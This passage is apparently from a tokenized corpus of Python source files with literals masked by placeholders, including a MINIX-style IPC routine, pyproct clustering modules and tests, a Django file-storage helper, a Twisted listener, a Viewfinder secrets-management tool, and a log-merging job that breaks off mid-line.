RTS_SENDING ) : <EOL> if not ( caller_ptr [ '<STR_LIT>' ] & MF_REPLY_PEND ) : <EOL> src_id = has_pending_notify ( caller_ptr , src_p ) <EOL> if src_id != NULL_PRIV_ID : <EOL> src_proc_nr = id_to_nr ( src_id ) <EOL> if DEBUG_ENABLE_IPC_WARNINGS : <EOL> print ( '<STR_LIT>' , src_proc_nr ) <EOL> assert ( src_proc_nr != NONE ) <EOL> unset_notify_pending ( caller_ptr , src_id ) <EOL> hisep = proc_addr ( src_proc_nr ) [ '<STR_LIT>' ] <EOL> assert ( not ( caller_ptr [ '<STR_LIT>' ] & MF_DELIVERMSG ) ) <EOL> assert ( src_e == ANY or hisep == src_e ) <EOL> BuildNotifyMessage ( caller_ptr [ '<STR_LIT>' ] , <EOL> src_proc_nr , <EOL> caller_ptr ) <EOL> caller_ptr [ '<STR_LIT>' ] [ '<STR_LIT>' ] = hisep <EOL> caller_ptr [ '<STR_LIT>' ] |= MF_DELIVERMSG <EOL> IPC_STATUS_ADD_CALL ( caller_ptr , NOTIFY ) <EOL> return receive_done ( caller_ptr ) <EOL> if has_pending_asend ( caller_ptr , src_p ) != NULL_PRIV_ID : <EOL> if src_p != ANY : <EOL> r = try_one ( proc_addr ( src_p ) , caller_ptr ) <EOL> else : <EOL> r = try_async ( caller_ptr ) <EOL> if r == OK : <EOL> IPC_STATUS_ADD_CALL ( caller_ptr , SENDA ) <EOL> return receive_done <EOL> '''<STR_LIT>''' <EOL> """<STR_LIT>""" <EOL> '''<STR_LIT>''' <EOL> if not ( flags & NON_BLOCKING ) : <EOL> if _deadlock ( RECEIVE , caller_ptr , src_e ) : <EOL> return ELOCKED <EOL> caller_ptr [ '<STR_LIT>' ] = src_e <EOL> RTS_SET ( caller_tr , RTS_RECEIVING ) <EOL> return OK <EOL> else : <EOL> return ENOTREADY <EOL> return receive_done ( caller_ptr ) </s>
<s> import sys , re <EOL> import os <EOL> def main ( ) : <EOL> upload_command = "<STR_LIT>" <EOL> if len ( sys . argv ) > <NUM_LIT:1> and sys . argv [ <NUM_LIT:1> ] == "<STR_LIT>" : <EOL> upload_command = "<STR_LIT>" <EOL> os . chdir ( "<STR_LIT:..>" ) <EOL> os . system ( "<STR_LIT>" + upload_command ) <EOL> os . system ( "<STR_LIT>" ) <EOL> os . system ( "<STR_LIT>" ) <EOL> os . system ( "<STR_LIT>" + upload_command ) <EOL> print ( """<STR_LIT>""" ) <EOL> print ( """<STR_LIT>""" ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> sys . exit ( main ( ) ) </s>
<s> """<STR_LIT>""" <EOL> import pyproct . clustering . algorithms . dbscan . cython . cythonDbscanTools as dbscanTools <EOL> from pyproct . clustering . algorithms . dbscan . cython . cythonDbscanTools import k_scale_gen , k_dist , zhou_adaptative_determination <EOL> import numpy <EOL> import math <EOL> class ParametersGenerator ( object ) : <EOL> def __init__ ( self , parameters , matrix_handler ) : <EOL> """<STR_LIT>""" <EOL> self . distance_matrix = matrix_handler . distance_matrix <EOL> self . parameters = parameters <EOL> @ classmethod <EOL> def get_base_parameters ( cls ) : <EOL> """<STR_LIT>""" <EOL> return { <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : None <EOL> } <EOL> def get_parameters ( self ) : <EOL> """<STR_LIT>""" <EOL> run_parameters = [ ] <EOL> if "<STR_LIT>" in self . parameters [ "<STR_LIT>" ] [ "<STR_LIT>" ] [ "<STR_LIT>" ] : <EOL> max_eps_tries = self . parameters [ "<STR_LIT>" ] [ "<STR_LIT>" ] [ "<STR_LIT>" ] [ "<STR_LIT>" ] <EOL> else : <EOL> max_eps_tries = <NUM_LIT:10> <EOL> num_elements = self . distance_matrix . row_length <EOL> klist = k_scale_gen ( math . log ( num_elements ) ) <EOL> buffer = numpy . empty ( num_elements ) <EOL> kdist_matrix = k_dist ( klist , buffer , self . distance_matrix ) <EOL> dbscan_param_pairs = dbscanTools . dbscan_param_space_search ( self . parameters [ "<STR_LIT>" ] [ "<STR_LIT>" ] [ "<STR_LIT>" ] , <EOL> max_eps_tries , <EOL> num_elements , <EOL> klist , <EOL> kdist_matrix ) + zhou_adaptative_determination ( kdist_matrix , self . distance_matrix ) <EOL> for ( minpts , eps ) in dbscan_param_pairs : <EOL> run_parameter = ParametersGenerator . get_base_parameters ( ) <EOL> run_parameter [ "<STR_LIT>" ] = minpts <EOL> run_parameter [ "<STR_LIT>" ] = eps <EOL> run_parameters . append ( run_parameter ) <EOL> return run_parameters , [ ] </s>
<s> """<STR_LIT>""" <EOL> class Analysis ( object ) : <EOL> def __init__ ( self , name , analysis_function , other_params = None ) : <EOL> """<STR_LIT>""" <EOL> self . name = name <EOL> self . analysis_function = analysis_function <EOL> self . other_params = other_params <EOL> def run ( self , clustering ) : <EOL> """<STR_LIT>""" <EOL> if self . other_params : <EOL> return self . analysis_function ( clustering , self . other_params ) <EOL> else : <EOL> return self . analysis_function ( clustering ) </s>
<s> """<STR_LIT>""" <EOL> import pyproct . clustering . algorithms . gromos . parametersGeneration as gromosParametersGeneration <EOL> import pyproct . clustering . algorithms . kmedoids . parametersGeneration as kmedoidsParametersGeneration <EOL> import pyproct . clustering . algorithms . random . parametersGeneration as randomParametersGeneration <EOL> import pyproct . clustering . algorithms . spectral . parametersGeneration as spectralParametersGeneration <EOL> import pyproct . clustering . algorithms . hierarchical . parametersGeneration as hierarchicalParametersGeneration <EOL> import pyproct . clustering . algorithms . dbscan . parametersGeneration as dbscanParametersGeneration <EOL> class AlgorithmRunParametersGenerator ( object ) : <EOL> def __init__ ( self , parameters , matrix_handler ) : <EOL> """<STR_LIT>""" <EOL> self . matrix_handler = matrix_handler <EOL> self . parameters = parameters <EOL> def get_parameters_for_type ( self , algorithm_type ) : <EOL> """<STR_LIT>""" <EOL> generator = None <EOL> if algorithm_type == "<STR_LIT>" : <EOL> generator = gromosParametersGeneration . ParametersGenerator ( self . parameters , self . matrix_handler ) <EOL> elif algorithm_type == "<STR_LIT>" : <EOL> generator = spectralParametersGeneration . ParametersGenerator ( self . parameters , self . matrix_handler ) <EOL> elif algorithm_type == "<STR_LIT>" : <EOL> generator = kmedoidsParametersGeneration . ParametersGenerator ( self . parameters , self . matrix_handler ) <EOL> elif algorithm_type == "<STR_LIT>" : <EOL> generator = hierarchicalParametersGeneration . ParametersGenerator ( self . parameters , self . matrix_handler ) <EOL> elif algorithm_type == "<STR_LIT>" : <EOL> generator = dbscanParametersGeneration . ParametersGenerator ( self . parameters , self . matrix_handler ) <EOL> elif algorithm_type == "<STR_LIT>" : <EOL> generator = randomParametersGeneration . ParametersGenerator ( self . parameters , self . matrix_handler ) <EOL> return generator . get_parameters ( ) </s>
<s> """<STR_LIT>""" <EOL> import glob <EOL> import os <EOL> from pyproct . data . handler . dataSource import DataSource <EOL> import json <EOL> from pyproct . tools . commonTools import convert_to_utf8 <EOL> import copy <EOL> class SourceGenerator ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , source_list ) : <EOL> self . source_list = [ DataSource ( source ) for source in SourceGenerator . inflate_source_list ( source_list ) ] <EOL> @ classmethod <EOL> def inflate_source_list ( cls , source_list ) : <EOL> inflated_list = [ ] <EOL> for source in source_list : <EOL> if isinstance ( source , basestring ) : <EOL> _ , ext = os . path . splitext ( source ) <EOL> if ext == "<STR_LIT>" : <EOL> try : <EOL> inflated_list . extend ( cls . inflate_source_list ( cls . get_sources_from_file_list ( source ) ) ) <EOL> except Exception , e : <EOL> print "<STR_LIT>" % source <EOL> print e . message <EOL> exit ( ) <EOL> else : <EOL> inflated_list . extend ( cls . do_glob ( source ) ) <EOL> else : <EOL> inflated_list . extend ( cls . get_sources_from_dictionary ( source ) ) <EOL> return inflated_list <EOL> @ classmethod <EOL> def do_glob ( cls , path ) : <EOL> paths = glob . glob ( path ) <EOL> if len ( paths ) > <NUM_LIT:0> : <EOL> return paths <EOL> else : <EOL> print "<STR_LIT>" % path <EOL> exit ( ) <EOL> @ classmethod <EOL> def get_sources_from_file_list ( cls , list_file ) : <EOL> """<STR_LIT>""" <EOL> return [ convert_to_utf8 ( json . loads ( line ) ) for line in open ( list_file , "<STR_LIT:r>" ) ] <EOL> @ classmethod <EOL> def get_sources_from_dictionary ( cls , info_dict ) : <EOL> """<STR_LIT>""" <EOL> inflated_dics = [ ] <EOL> for path in cls . do_glob ( info_dict [ "<STR_LIT:source>" ] ) : <EOL> clone = copy . deepcopy ( info_dict ) <EOL> clone [ "<STR_LIT:source>" ] = path <EOL> inflated_dics . append ( clone ) <EOL> return inflated_dics </s>
<s> """<STR_LIT>""" <EOL> from pyproct . driver . observer . accumulativeObserver import AccumulativeObserver <EOL> class Observable ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , observer = None ) : <EOL> if not observer is None : <EOL> self . observer = observer <EOL> else : <EOL> self . observer = AccumulativeObserver ( ) <EOL> def notify ( self , action , message ) : <EOL> self . observer . notify ( self . __class__ . __name__ , action , message ) </s>
<s> '''<STR_LIT>''' <EOL> import unittest <EOL> from pyRMSD . condensedMatrix import CondensedMatrix <EOL> import numpy <EOL> from pyproct . postprocess . actions . confSpaceComparison . overlapCalculator import OverlapCalculator <EOL> class Test ( unittest . TestCase ) : <EOL> def test_calculate_global_overlap ( self ) : <EOL> distance_matrix = CondensedMatrix ( [ <NUM_LIT:1.> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT:1.> , <EOL> <NUM_LIT> ] ) <EOL> decomposed_clusters = [ { "<STR_LIT>" : [ <NUM_LIT:0> ] , "<STR_LIT>" : [ <NUM_LIT:1> ] } , { "<STR_LIT>" : [ <NUM_LIT:2> ] , "<STR_LIT>" : [ <NUM_LIT:3> ] } ] <EOL> self . assertEqual ( <NUM_LIT:0.> , OverlapCalculator . calculate_global_overlap ( decomposed_clusters , distance_matrix , <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> decomposed_clusters = [ { "<STR_LIT>" : [ <NUM_LIT:0> ] , "<STR_LIT>" : [ <NUM_LIT:1> ] } , { "<STR_LIT>" : [ <NUM_LIT:2> ] } , { "<STR_LIT>" : [ <NUM_LIT:3> ] } ] <EOL> self . assertEqual ( <NUM_LIT:0.> , OverlapCalculator . calculate_global_overlap ( decomposed_clusters , distance_matrix , <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> def test_calculate_cluster_overlap ( self ) : <EOL> distance_matrix = CondensedMatrix ( [ <NUM_LIT:1.> , <NUM_LIT> , <EOL> <NUM_LIT> ] ) <EOL> decomposed_cluster = { "<STR_LIT>" : [ <NUM_LIT:0> ] , "<STR_LIT>" : [ <NUM_LIT:1> ] , "<STR_LIT>" : [ <NUM_LIT:2> ] } <EOL> self . assertAlmostEqual ( <NUM_LIT> , OverlapCalculator . calculate_cluster_overlap ( <NUM_LIT:1> , decomposed_cluster , distance_matrix ) , <NUM_LIT:12> ) <EOL> self . assertAlmostEqual ( <NUM_LIT> , OverlapCalculator . calculate_cluster_overlap ( <NUM_LIT:2> , decomposed_cluster , distance_matrix ) , <NUM_LIT:12> ) <EOL> decomposed_cluster = { "<STR_LIT>" : [ <NUM_LIT:0> ] , "<STR_LIT>" : [ <NUM_LIT:1> ] } <EOL> self . assertAlmostEqual ( <NUM_LIT:1.> , OverlapCalculator . calculate_cluster_overlap ( <NUM_LIT:1> , decomposed_cluster , distance_matrix ) , <NUM_LIT:12> ) <EOL> self . assertAlmostEqual ( <NUM_LIT:1.> , OverlapCalculator . calculate_cluster_overlap ( <NUM_LIT:2> , decomposed_cluster , distance_matrix ) , <NUM_LIT:12> ) <EOL> def test_get_cluster_min_max_distances ( self ) : <EOL> distance_matrix = CondensedMatrix ( [ <NUM_LIT:1.> , <NUM_LIT> , <EOL> <NUM_LIT> ] ) <EOL> decomposed_cluster = { "<STR_LIT>" : [ <NUM_LIT:0> ] , "<STR_LIT>" : [ <NUM_LIT:1> ] , "<STR_LIT>" : [ <NUM_LIT:2> ] } <EOL> expected_min_d , expected_max_d = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , [ <NUM_LIT:1.> , <NUM_LIT:1.> , <NUM_LIT> ] <EOL> min_d , max_d = OverlapCalculator . get_cluster_min_max_distances ( decomposed_cluster , distance_matrix ) <EOL> numpy . testing . assert_array_almost_equal ( min_d , expected_min_d , <NUM_LIT:8> ) <EOL> numpy . testing . assert_array_almost_equal ( max_d , expected_max_d , <NUM_LIT:8> ) <EOL> distance_matrix = CondensedMatrix ( [ <NUM_LIT:1.> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT:1.> , <EOL> <NUM_LIT> ] ) <EOL> decomposed_cluster = { "<STR_LIT>" : [ <NUM_LIT:0> , <NUM_LIT:3> ] , "<STR_LIT>" : [ <NUM_LIT:1> ] , "<STR_LIT>" : [ <NUM_LIT:2> ] } <EOL> expected_min_d , expected_max_d = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , [ <NUM_LIT:1.> , <NUM_LIT:1.> , <NUM_LIT:1.> , <NUM_LIT> ] <EOL> min_d , max_d = OverlapCalculator . get_cluster_min_max_distances ( decomposed_cluster , distance_matrix ) <EOL> numpy . testing . assert_array_almost_equal ( min_d , expected_min_d , <NUM_LIT:8> ) <EOL> numpy . testing . assert_array_almost_equal ( max_d , expected_max_d , <NUM_LIT:8> ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> '''<STR_LIT>''' <EOL> def handle_matrix_test_class ( ) : <EOL> return AnotherMatrixTestClass <EOL> class AnotherMatrixTestClass ( ) : <EOL> def __init__ ( self ) : <EOL> pass </s>
<s> from db_file_storage . storage import DatabaseFileStorage <EOL> def delete_file_if_needed ( instance , filefield_name ) : <EOL> """<STR_LIT>""" <EOL> if instance . id : <EOL> model_class = type ( instance ) <EOL> if model_class . objects . filter ( pk = instance . pk ) . exclude ( <EOL> ** { '<STR_LIT>' % filefield_name : True } <EOL> ) . exclude ( <EOL> ** { '<STR_LIT>' % filefield_name : '<STR_LIT>' } <EOL> ) . exists ( ) : <EOL> old_file = getattr ( <EOL> model_class . objects . only ( filefield_name ) . get ( pk = instance . id ) , <EOL> filefield_name <EOL> ) <EOL> else : <EOL> old_file = None <EOL> if old_file : <EOL> if ( old_file . name == getattr ( instance , filefield_name ) ) is False : <EOL> DatabaseFileStorage ( ) . delete ( old_file . name ) <EOL> def delete_file ( instance , filefield_name ) : <EOL> """<STR_LIT>""" <EOL> file_instance = getattr ( instance , filefield_name ) <EOL> if file_instance : <EOL> DatabaseFileStorage ( ) . delete ( file_instance . name ) </s>
<s> from twisted . internet import reactor <EOL> from twisted . internet . protocol import Factory <EOL> from twisted . internet . error import ConnectionDone <EOL> from twisted . protocols . basic import LineOnlyReceiver <EOL> import sys <EOL> from conf import * <EOL> from session_inspector import SessionInspectorMemcache <EOL> class InspectorReceiver ( LineOnlyReceiver ) : <EOL> delimiter = '<STR_LIT:\r\n>' <EOL> def __init__ ( self ) : <EOL> self . inspector = SessionInspectorMemcache ( ) <EOL> def connectionMade ( self ) : <EOL> self . peer = self . transport . getPeer ( ) <EOL> self . peerAddr = "<STR_LIT>" % ( self . peer . host , self . peer . port ) <EOL> print ( "<STR_LIT>" % ( self . __class__ . __name__ , self . peerAddr ) ) <EOL> def connectionLost ( self , reason ) : <EOL> if reason . check ( ConnectionDone ) : <EOL> print ( "<STR_LIT>" % ( self . __class__ . __name__ , self . peerAddr ) ) <EOL> else : <EOL> print ( "<STR_LIT>" % ( self . __class__ . __name__ , self . peerAddr , reason . value ) ) <EOL> def isAuth ( self , is_auth ) : <EOL> self . transport . write ( "<STR_LIT>" % ( is_auth , ) ) <EOL> def lineReceived ( self , line ) : <EOL> try : <EOL> values = line . strip ( ) . split ( ) <EOL> if len ( values ) < <NUM_LIT:1> : <EOL> pass <EOL> if values [ <NUM_LIT:0> ] == '<STR_LIT>' and len ( values ) > <NUM_LIT:1> : <EOL> for key in values [ <NUM_LIT:1> : ] : <EOL> self . isAuth ( self . inspector . isauth ( key ) ) <EOL> elif values [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> self . transport . loseConnection ( ) <EOL> else : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> except Exception as inst : <EOL> print type ( inst ) <EOL> print inst . args <EOL> print inst <EOL> print ( '<STR_LIT>' % self . peerAddr ) <EOL> return <EOL> def startListener ( interface , port , protocol ) : <EOL> factory = Factory ( ) <EOL> factory . protocol = protocol <EOL> return reactor . listenTCP ( int ( port ) , factory , interface = interface ) <EOL> startListener ( INSPECTOR_INTERFACE , INSPECTOR_PORT , InspectorReceiver ) <EOL> reactor . run ( ) </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> import json <EOL> import logging <EOL> import sys <EOL> from tornado import ioloop , options <EOL> from viewfinder . backend . base import base_options <EOL> from viewfinder . backend . base import secrets , util <EOL> options . define ( '<STR_LIT>' , '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> options . define ( '<STR_LIT>' , '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> options . define ( '<STR_LIT>' , default = True , <EOL> help = '<STR_LIT>' ) <EOL> def _GetSecretsManager ( ) : <EOL> if options . options . shared : <EOL> return secrets . GetSharedSecretsManager ( ) <EOL> else : <EOL> return secrets . GetUserSecretsManager ( ) <EOL> def _ListSecrets ( io_loop ) : <EOL> """<STR_LIT>""" <EOL> for f in _GetSecretsManager ( ) . ListSecrets ( ) : <EOL> print '<STR_LIT>' % f <EOL> io_loop . stop ( ) <EOL> def _GetSecret ( io_loop , secret ) : <EOL> """<STR_LIT>""" <EOL> print '<STR_LIT>' % ( secret , _GetSecretsManager ( ) . GetSecret ( secret ) ) <EOL> io_loop . stop ( ) <EOL> def _PutSecret ( io_loop , secret ) : <EOL> """<STR_LIT>""" <EOL> _GetSecretsManager ( ) . PutSecret ( secret , sys . stdin . read ( ) ) <EOL> io_loop . stop ( ) <EOL> def _PutCryptKeyset ( io_loop , secret ) : <EOL> """<STR_LIT>""" <EOL> _GetSecretsManager ( ) . PutSecret ( secret , json . dumps ( secrets . CreateCryptKeyset ( secret ) ) ) <EOL> io_loop . stop ( ) <EOL> def _PutSigningKeyset ( io_loop , secret ) : <EOL> """<STR_LIT>""" <EOL> _GetSecretsManager ( ) . PutSecret ( secret , json . dumps ( secrets . CreateSigningKeyset ( secret ) ) ) <EOL> io_loop . stop ( ) <EOL> def _EncryptSecrets ( io_loop ) : <EOL> """<STR_LIT>""" <EOL> print '<STR_LIT>' <EOL> ex_sm = _GetSecretsManager ( ) <EOL> print '<STR_LIT>' <EOL> if options . options . shared : <EOL> new_sm = secrets . SecretsManager ( '<STR_LIT>' , options . options . domain , options . options . secrets_dir ) <EOL> else : <EOL> new_sm = secrets . SecretsManager ( '<STR_LIT:user>' , options . options . domain , options . options . user_secrets_dir ) <EOL> new_sm . Init ( should_prompt = True , query_twice = True ) <EOL> print '<STR_LIT>' <EOL> for secret in ex_sm . ListSecrets ( ) : <EOL> print '<STR_LIT>' % secret <EOL> new_sm . PutSecret ( secret , ex_sm . GetSecret ( secret ) ) <EOL> io_loop . stop ( ) <EOL> def main ( ) : <EOL> """<STR_LIT>""" <EOL> io_loop = ioloop . IOLoop . current ( ) <EOL> options . parse_command_line ( ) <EOL> def _OnException ( type , value , traceback ) : <EOL> logging . error ( '<STR_LIT>' % options . options . secrets_mode , exc_info = ( type , value , traceback ) ) <EOL> io_loop . stop ( ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> with util . ExceptionBarrier ( _OnException ) : <EOL> if options . options . secrets_mode == '<STR_LIT>' : <EOL> _ListSecrets ( io_loop ) <EOL> elif options . options . secrets_mode == '<STR_LIT>' : <EOL> _GetSecret ( io_loop , options . options . secret ) <EOL> elif options . options . secrets_mode == '<STR_LIT>' : <EOL> _PutSecret ( io_loop , options . options . secret ) <EOL> elif options . options . secrets_mode == '<STR_LIT>' : <EOL> _PutCryptKeyset ( io_loop , options . options . secret ) <EOL> elif options . options . secrets_mode == '<STR_LIT>' : <EOL> _PutSigningKeyset ( io_loop , options . options . secret ) <EOL> elif options . options . secrets_mode == '<STR_LIT>' : <EOL> _EncryptSecrets ( io_loop ) <EOL> else : <EOL> raise Exception ( '<STR_LIT>' % options . options . secrets_mode ) <EOL> io_loop . start ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> sys . exit ( main ( ) ) </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> import re <EOL> from tornado . util import import_object <EOL> TABLE_ALIAS_MAP = { <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> def GetTableClass ( class_name ) : <EOL> if class_name in TABLE_ALIAS_MAP : <EOL> qualified_name = TABLE_ALIAS_MAP [ class_name ] <EOL> else : <EOL> package_name = re . sub ( r'<STR_LIT>' , r'<STR_LIT>' , class_name ) . lower ( ) <EOL> qualified_name = '<STR_LIT>' % ( package_name , class_name ) <EOL> if qualified_name is None : <EOL> return None <EOL> return import_object ( qualified_name ) </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> STOP_WORDS = set ( <EOL> """<STR_LIT>""" . split ( ) ) </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> import time <EOL> import unittest <EOL> from functools import partial <EOL> from viewfinder . backend . base . testing import async_test <EOL> from viewfinder . backend . db . episode import Episode <EOL> from viewfinder . backend . db . photo import Photo <EOL> from viewfinder . backend . db . post import Post <EOL> from base_test import DBBaseTestCase <EOL> class PostTestCase ( DBBaseTestCase ) : <EOL> def testPostIdConstruction ( self ) : <EOL> """<STR_LIT>""" <EOL> def _RoundTripPostId ( original_episode_id , original_photo_id ) : <EOL> post_id = Post . ConstructPostId ( original_episode_id , original_photo_id ) <EOL> new_episode_id , new_photo_id = Post . DeconstructPostId ( post_id ) <EOL> self . assertEqual ( original_episode_id , new_episode_id ) <EOL> self . assertEqual ( original_photo_id , new_photo_id ) <EOL> _RoundTripPostId ( Episode . ConstructEpisodeId ( time . time ( ) , <NUM_LIT:0> , <NUM_LIT:0> ) , <EOL> Photo . ConstructPhotoId ( time . time ( ) , <NUM_LIT:0> , <NUM_LIT:0> ) ) <EOL> _RoundTripPostId ( Episode . ConstructEpisodeId ( time . time ( ) , <NUM_LIT:1> , ( <NUM_LIT> , '<STR_LIT>' ) ) , <EOL> Photo . ConstructPhotoId ( time . time ( ) , <NUM_LIT:1> , ( <NUM_LIT> , '<STR_LIT>' ) ) ) <EOL> _RoundTripPostId ( Episode . ConstructEpisodeId ( time . time ( ) , <NUM_LIT:1> , ( <NUM_LIT> , None ) ) , <EOL> Photo . ConstructPhotoId ( time . time ( ) , <NUM_LIT:1> , ( <NUM_LIT> , None ) ) ) <EOL> _RoundTripPostId ( Episode . ConstructEpisodeId ( time . time ( ) , <NUM_LIT> , ( <NUM_LIT> , '<STR_LIT>' ) ) , <EOL> Photo . ConstructPhotoId ( time . time ( ) , <NUM_LIT> , ( <NUM_LIT> , '<STR_LIT>' ) ) ) <EOL> def testPostIdOrdering ( self ) : <EOL> """<STR_LIT>""" <EOL> def _Compare ( episode_id1 , photo_id1 , episode_id2 , photo_id2 ) : <EOL> result = cmp ( episode_id1 , episode_id2 ) <EOL> if result == <NUM_LIT:0> : <EOL> result = cmp ( photo_id1 , photo_id2 ) <EOL> post_id1 = Post . ConstructPostId ( episode_id1 , photo_id1 ) <EOL> post_id2 = Post . ConstructPostId ( episode_id2 , photo_id2 ) <EOL> self . assertEqual ( cmp ( post_id1 , post_id2 ) , result ) <EOL> timestamp = time . time ( ) <EOL> episode_id1 = Episode . ConstructEpisodeId ( timestamp , <NUM_LIT:1> , ( <NUM_LIT> , None ) ) <EOL> episode_id2 = Episode . ConstructEpisodeId ( timestamp , <NUM_LIT:1> , ( <NUM_LIT> , None ) ) <EOL> photo_id1 = Photo . ConstructPhotoId ( timestamp , <NUM_LIT:1> , <NUM_LIT> ) <EOL> photo_id2 = Photo . ConstructPhotoId ( timestamp , <NUM_LIT:1> , <NUM_LIT> ) <EOL> _Compare ( episode_id1 , photo_id1 , episode_id2 , photo_id2 ) <EOL> episode_id1 = Episode . ConstructEpisodeId ( timestamp , <NUM_LIT> , <NUM_LIT:1> ) <EOL> episode_id2 = Episode . ConstructEpisodeId ( timestamp , <NUM_LIT> , <NUM_LIT:1> ) <EOL> photo_id1 = Photo . ConstructPhotoId ( timestamp , <NUM_LIT> , ( <NUM_LIT:1> , None ) ) <EOL> photo_id2 = Photo . ConstructPhotoId ( timestamp , <NUM_LIT> , ( <NUM_LIT:1> , None ) ) <EOL> _Compare ( episode_id1 , photo_id1 , episode_id2 , photo_id2 ) <EOL> episode_id1 = Episode . ConstructEpisodeId ( timestamp , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> episode_id2 = Episode . ConstructEpisodeId ( timestamp , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> photo_id1 = Photo . ConstructPhotoId ( timestamp , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> photo_id2 = Photo . ConstructPhotoId ( timestamp , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> _Compare ( episode_id1 , photo_id1 , episode_id2 , photo_id2 ) <EOL> episode_id1 = Episode . ConstructEpisodeId ( timestamp , <NUM_LIT:1> , <NUM_LIT:0> ) <EOL> episode_id2 = Episode . ConstructEpisodeId ( timestamp , <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> photo_id1 = Photo . ConstructPhotoId ( timestamp , <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> photo_id2 = Photo . ConstructPhotoId ( timestamp , <NUM_LIT:1> , <NUM_LIT:0> ) <EOL> _Compare ( episode_id1 , photo_id1 , episode_id2 , photo_id2 ) <EOL> episode_id1 = Episode . ConstructEpisodeId ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> episode_id2 = Episode . ConstructEpisodeId ( <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> photo_id1 = Photo . ConstructPhotoId ( <NUM_LIT:1> , <NUM_LIT:0> , ( <NUM_LIT:0> , None ) ) <EOL> photo_id2 = Photo . ConstructPhotoId ( <NUM_LIT:0> , <NUM_LIT:0> , ( <NUM_LIT:0> , None ) ) <EOL> _Compare ( episode_id1 , photo_id1 , episode_id2 , photo_id2 ) <EOL> episode_id1 = Episode . ConstructEpisodeId ( timestamp , <NUM_LIT:0> , ( <NUM_LIT:0> , '<STR_LIT:1>' ) ) <EOL> episode_id2 = Episode . ConstructEpisodeId ( timestamp , <NUM_LIT:0> , ( <NUM_LIT:0> , '<STR_LIT:2>' ) ) <EOL> photo_id1 = Photo . ConstructPhotoId ( timestamp , <NUM_LIT:0> , ( <NUM_LIT:0> , None ) ) <EOL> photo_id2 = Photo . ConstructPhotoId ( timestamp , <NUM_LIT:0> , ( <NUM_LIT:0> , None ) ) <EOL> _Compare ( episode_id1 , photo_id1 , episode_id2 , photo_id2 ) <EOL> episode_id1 = Episode . ConstructEpisodeId ( timestamp , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> episode_id2 = Episode . ConstructEpisodeId ( timestamp , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> photo_id1 = Photo . ConstructPhotoId ( timestamp , <NUM_LIT:0> , ( <NUM_LIT:0> , u'<STR_LIT>' ) ) <EOL> photo_id2 = Photo . ConstructPhotoId ( timestamp , <NUM_LIT:0> , ( <NUM_LIT:0> , u'<STR_LIT>' ) ) <EOL> _Compare ( episode_id1 , photo_id1 , episode_id2 , photo_id2 ) </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> import cStringIO <EOL> import logging <EOL> import os <EOL> import re <EOL> import sys <EOL> from tornado import gen , options <EOL> from viewfinder . backend . base import main , retry <EOL> from viewfinder . backend . db import db_client <EOL> from viewfinder . backend . db . job import Job <EOL> from viewfinder . backend . logs import logs_util , log_merger <EOL> from viewfinder . backend . storage import store_utils <EOL> from viewfinder . backend . storage . object_store import ObjectStore <EOL> options . define ( '<STR_LIT>' , default = None , help = '<STR_LIT>' ) <EOL> options . define ( '<STR_LIT>' , default = True , help = '<STR_LIT>' ) <EOL> options . define ( '<STR_LIT>' , default = True , help = '<STR_LIT>' ) <EOL> options . define ( '<STR_LIT>' , type = bool , default = True , <EOL> help = '<STR_LIT>' ) <EOL> options . define ( '<STR_LIT>' , type = int , default = None , help = '<STR_LIT>' ) <EOL> kS3UploadRetryPolicy = retry . RetryPolicy ( max_tries = <NUM_LIT:5> , timeout = <NUM_LIT> , <EOL> min_delay = <NUM_LIT:1> , max_delay = <NUM_LIT:30> , <EOL> check_exception = retry . RetryPolicy . AlwaysRetryOnException ) <EOL> @ gen . engine <EOL> def ProcessFiles ( logs_store , merged_store , logs_paths , filenames , dry_run , callback ) : <EOL> """<STR_LIT>""" <EOL> processed_files = [ ] <EOL> day_instance_logs = { } <EOL> s3_base = logs_paths . MergedDirectory ( ) <EOL> @ gen . engine <EOL> def _AddEntry ( instance , entry , callback ) : <EOL> """<STR_LIT>""" <EOL> if not entry : <EOL> callback ( ) <EOL> return <EOL> parsed = logs_util . ParseLogLine ( entry ) <EOL> if not parsed : <EOL> callback ( ) <EOL> return <EOL> day , _ , _ , _ = parsed <EOL> day_log = None <EOL> if ( instance , day ) not in day_instance_logs : <EOL> day_instance_logs [ ( instance , day ) ] = log_merger . LocalLogMerge ( merged_store , [ day , instance ] , s3_base ) <EOL> day_log = day_instance_logs [ ( instance , day ) ] <EOL> yield gen . Task ( 